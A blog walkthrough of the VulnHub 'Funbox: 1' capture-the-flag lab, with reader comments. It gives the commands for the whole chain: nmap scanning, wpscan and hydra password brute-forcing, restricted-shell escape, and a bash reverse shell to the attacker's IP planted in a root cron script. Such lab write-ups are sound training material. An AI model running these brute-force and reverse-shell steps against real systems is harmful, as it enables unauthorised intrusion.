VulnHub Funbox: 1 walkthrough
Hello hackers. Today we are talking about another VulnHub machine – “Funbox: 1”, made by twitter@0815R2d2. It’s presented as Boot2Root and you will be able to solve it for 20 minutes. I’m not really sure about the time but let’s try it out.
https://www.vulnhub.com/entry/funbox-1,518/
To be honest I could not root this machine for 20 minutes. I had spent about 1,5 hours before I reached the aim. It involved enumeration, bruteforcing, bypassing bash restrictions and reverse shell. Let’s begin our pentest.
Ok, we downloaded and installed the Funbox. Than, using netdiscover, we recognized it’s IP-address:
sudo netdiscover
Our victim is 192.168.1.102. Firstly, we should scan the machine. Some of penetration testers use ZenMap as it has GUI interface. But I prefer the speed instead of good-looking suit.
nmap -sS -sC -sV -p- 192.168.1.102
As we can see Funbox has 4 open ports: ports 21 and 22 for FTP and SSH protocols respectively, port 80 for the Web and port 33060 for the MySQL. I suggest starting from HTTP.
If you look at the NMap’s dump closer you will see several interesting things: 1. disallowed directory such as /secret/ and; 2. redirect to https://funbox.fritx.box/
The next we have to do is change /etc/hosts by adding there our new host:
sudo nano /etc/hosts
After all of those preparations we are ready to open Firefox and start browsing.
https://funbox.fritz.box/
What we have here? WordPress 5.4.2 on the Apache 2.4.41. Quite new versions to be vulnerable.
Let’s check the “secret” directory which we found earlier…
https://funbox.fritz.box/secret/
Ahhah, Try harder ;) The reference to the OSCP course! Ok. But what’s next?
Let’s look closer to the WordPress and try to enumerate it. I usually do the next 3 stuff: enum vulnerable plugins, enum vulnerable themes and enum users.
Unfortunately, there were not any compromised themes or plugins. But we were able to find 2 users from the CMS: admin and Joe.
wpscan --url https://funbox.fritz.box/ -e u
We have users’s names and now we have to find passwords for them. Let’s try to bruteforce. It’s a CTF, so the right password should be either on the Web-page or in the rockyou.txt file. The first one doesn’t work (I tried it out using cewl), so we will use rockyou.txt.
wpscan --url https://funbox.fritz.box/ --passwords /root/Desktop/rockyou.txt --usernames joe
Wow, it’s definitely incredible. We’ve found the password for joe – 12345. Ok, good one. Let’s try the same method for admin.
wpscan --url https://funbox.fritz.box/ --passwords /root/Desktop/rockyou.txt --usernames admin
Is it for real? :) So simple? Ok. Now we can log in as admin to the WordPress, change some source code and get a reverse shell as www-data. But do we really need the www-data access? As you may remember, we have FTP and SSH open ports so let’s try to get access using those protocols. For this purpose we should create a file and put there in our logins and passwords.
hydra -C users.txt ssh://192.168.1.102
hydra -C users.txt ftp://192.168.1.102
Interesting. Before we connect via SSH, let’s check what kind of information is on the FTP.
…and let’s read the mbox:
As we can see here are 2 emails. One of them if useless, but the first one is a hint – BackUp script. We will keep it in mind.
Now let’s connect by SSH:
ssh [email protected]
password: 12345
And we are in. Let’s look around.
id; uname –a; sudo –l; pwd; ls
Let’s go further.
cd ..
export | grep -i "shell"
Ok, tricky move sysadmin, tricky move ;) Let’s see if you prohibited us to launch another shell.
bash
Easy-peasy, lemon squeezy :)
Ok, where were we? Almost forgotten about bash history. Let’s check it.
cat /home/joe/.bash_history
I think we’ve found backup script. According to the history, Joe may change the file. Let’s check it.
ls –l /home/funny/.backup.sh
Interesting. The owner of the file is Funny, and it’s executing from the Funny, but anyone can change it…
ls –al /home/funny
cat .reminder.sh
Interesting letter. Looks like .backup.sh is in the cron. Let’s try pspy64 to check our theory. I downloaded and put into /tmp pspy64. Now it’s time to launch it.
bash /tmp/pspy64
As you can see /home/funny/.backup.sh is running under UID=1000 (Funny) and UID=0 (root). So, let’s change the file and will wait for the incoming connection :)
First, let’s start listening…
nc –nlvp 2020
and add one little string.
bash -i >& /dev/tcp/192.168.1.137/2020 0>&1
nc –nlvp 2020
The first 2 attempts succeeded and we got only user. But the last one was under the root. We did it.
To conclude it is a good middle machine where you can improve your pentesting skills .
Looking forward to your comments and questions!
See you soon.
You can use this one instead: ``` grep "CRON" /var/log/cron.log ```
Cyber Security Enthusiast | Certified Ethical Hacker | Security+
4 年what makes you believe that .backup.sh is a cron job. I have read /etc/crontab using cat but I don't see it as cron.